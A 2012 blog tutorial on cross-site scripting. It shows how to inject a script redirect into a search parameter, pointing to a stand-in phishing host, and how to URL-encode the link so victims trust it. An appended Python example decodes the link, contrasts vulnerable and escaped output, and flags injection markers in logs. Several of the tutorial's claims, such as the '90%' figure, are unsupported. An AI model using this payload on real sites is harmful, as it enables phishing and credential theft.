Saturday 14 July 2012

Cross Site Scripting (XSS) Web Application Penetration Tutorial - Website Hacking Part 2

Cross-site scripting (XSS) occurs when someone inputs malicious data into a website, which causes the program to do something it wasn't intended to do. XSS attacks are very popular nowadays, and some of the largest websites have been affected by them, including Facebook, CNN, PayPal, Payza, Microsoft, and Yahoo. Site features that are usually vulnerable to XSS attacks are:

• Search Engines
• Login Forms
• Comment Fields

Three Types of XSS attacks:

1). Local XSS attacks are the rarest and the most dangerous. This attack requires an exploit for a browser vulnerability. With this type of attack, the hacker can install backdoors, Trojans and worms on your computer.

2). Non-persistent attacks are the ones usually used by hackers, and they are mostly harmless for the targeted website. Non-persistent attacks occur when JavaScript (the scripting language used for client-side web development) or HTML is inserted into a vulnerable page, which causes the user's output to be sent to the hacker's file. These attacks are only activated when the user visits the malicious link.

3). Persistent attacks are mostly (about 90% of the time) used against web applications/programs such as PDF books, forums, ad boxes and online games. With this attack a hacker can:

• Steal website cookies
• Deploy stealers
• Create worms

How Hackers Create Cross Site Scripting

Hackers knowledgeable in scripting/coding and PHP will be able to carry out advanced XSS attacks to steal your cookies and spread worms on any targeted website, but to show you a simple and quick example of something more realistic than the above, I have described how hackers use cross-site scripting (XSS).

1). Suppose a hacker wants to phish passwords from www.victim.com. If he is able to find an XSS vulnerability, he can create a link pointing to the victim's website that redirects to his phishing host.

2). When I inserted the script into the search box, a URL was formed that looked like the following:

3). In the link, the hacker would then replace everything between ?searchbox= and &search with the following JavaScript code:

<script>window.location = "http://phishing-site.com"</script>

4). Now when you go to the finished URL, the targeted site will redirect to the phishing website. Next, he would encode the link to make it look more secure and less suspicious. You can encode the URL at http://www.encodeurl.com/.

5). My finished encoded URL is:
http%3A%2F%2Flocalhost%2Fform.php%3Fsearchbox%3D%3Cscript%3Ewindow.location+%3D+%5C%22http%3A%2F%2Fphishing-site.com%5C%22%3C%2Fscript%3E%26search%3Dsearch%21
6). Once the victim opens that link, which points to the targeted website, he is more likely to fall for the phishing page.
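As an added example that is not part of the original post: the encoded URL from step 5 is percent-decoded to show what the server actually receives, the searchbox value is rendered both by a page that reflects it verbatim (the defect the post relies on) and by a corrected page that HTML-encodes it, and a simple heuristic flags such values during log review. The render_* and looks_like_reflected_xss functions are hypothetical models written in Python rather than the post's PHP form.php.

```python
import html
import re
from urllib.parse import parse_qs, unquote, unquote_plus, urlsplit

# The percent-encoded link from the post (copied from the page, not constructed).
ENCODED_URL = ("http%3A%2F%2Flocalhost%2Fform.php%3Fsearchbox%3D%3Cscript%3Ewindow.location"
               "+%3D+%5C%22http%3A%2F%2Fphishing-site.com%5C%22%3C%2Fscript%3E%26search%3Dsearch%21")

# Rough indicators of HTML/JS injection in a parameter value: a tag opening,
# a javascript: scheme, or an inline event-handler attribute.
_XSS_MARKERS = re.compile(r"<\s*/?\s*[a-z]|javascript\s*:|\bon[a-z]+\s*=", re.IGNORECASE)


def decode_url(encoded: str) -> str:
    """Undo the percent-encoding. It only disguises the link for a human reader;
    the server receives exactly the same query string either way."""
    return unquote(encoded)


def query_params(url: str) -> dict:
    """Split the query string into {name: first_value}, as the server would ('+' becomes space)."""
    query = urlsplit(url).query
    return {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}


def render_results_vulnerable(term: str) -> str:
    """Hypothetical search page that reflects the term verbatim: the injected <script> runs."""
    return f"<p>Results for: {term}</p>"


def render_results_safe(term: str) -> str:
    """Same page with contextual output encoding, so <script> arrives as text, not markup."""
    return f"<p>Results for: {html.escape(term, quote=True)}</p>"


def looks_like_reflected_xss(params: dict) -> bool:
    """Log-review heuristic: decode each value once more (catches double encoding)
    and flag anything that contains markup or script markers."""
    return any(_XSS_MARKERS.search(unquote_plus(v)) for v in params.values())


if __name__ == "__main__":
    url = decode_url(ENCODED_URL)
    params = query_params(url)
    print("decoded URL:    ", url)
    print("searchbox value:", params["searchbox"])
    print("vulnerable:     ", render_results_vulnerable(params["searchbox"]))
    print("hardened:       ", render_results_safe(params["searchbox"]))
    print("flagged:        ", looks_like_reflected_xss(params))
```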

Enjoy Hacking....
